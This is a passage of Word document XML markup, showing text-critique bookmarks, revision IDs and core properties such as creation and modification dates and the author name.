    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_HEPmcmHU" int2:invalidationBookmarkName="" int2:hashCode="AfDX6W9786L3QZ" int2:id="vVdt8uFx">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_IW40b0tV" int2:invalidationBookmarkName="" int2:hashCode="WGWPh/BdoKwaKX" int2:id="tuMR4eIw">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_IeEAxpYU" int2:invalidationBookmarkName="" int2:hashCode="tNWze/ephsE47e" int2:id="6PV7IAge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624BD4"/>
    <w:rsid w:val="5E4CDF0E"/>
    <w:rsid w:val="6562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4BD4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1A61EEDD-E21E-4BA8-9B07-7E0C4E18C4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8c745aff34045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2023-01-04T10:31:53.7813501Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-04T11:04:02.2610151Z</dcterms:modified>
  <dc:creator>naveen pulamarasetti</dc:creator>
  <lastModifiedBy>naveen pulamarasetti</lastModifiedBy>
</coreProperties>
</file>